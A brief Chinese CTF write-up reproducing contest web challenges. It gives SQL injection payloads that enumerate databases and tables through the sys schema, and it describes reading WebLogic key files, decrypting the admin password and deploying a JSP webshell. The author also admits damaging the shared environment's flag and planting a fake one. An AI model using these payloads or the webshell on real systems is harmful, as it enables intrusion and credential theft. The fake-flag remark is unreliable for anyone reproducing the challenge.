国庆赛部分赛题复现

web

sql2

环境有点问题,复现一半出不来了

1
2
3
4
5
6
7
8
9
查库名
username=admin&passwd=1%27union/**/select/**/group_concat(db),2/**/from/**/sys.schema_object_overview#

查表名

username=admin&passwd=admin'/**/union/**/select/**/group_concat(table_name),2/**/from/**/sys.schema_table_statistics/**/where/**/table_schema='flagisHere'#

无列名注入
username=admin&passwd=admin'/**/union/**/select/**/(select/**/group_concat(a)/**/from/**/(select/**/1,2,3/**/as/**/a/**/union/**/select/**/*/**/from/**/flagisHere.flAg

web6

按照wp的反弹shell没打通

web7

这个题学到的挺多的

先通过任意文件读取漏洞获得密钥和密文

1
2
./config/config.xml
./security/SerializedSystemIni.dat

然后用这个https://github.com/TideSec/Decrypt_Weblogic_Password文章中提到的,获得密码,登入后台,部署木马。

war木马,就是将jsp木马压缩成zip,然后改后缀就行,这里把war部署到服务器上。

访问大马文件http://host/test/JspSpy.jsp

找到个flag.tar,结果我解压的时候给破坏了,现在服务器里没flag了,它这个是所有人一个环境,后面复现的人得多少有点懵逼,所以:

我在根目录里面创建了个假的flag(哈哈哈,逃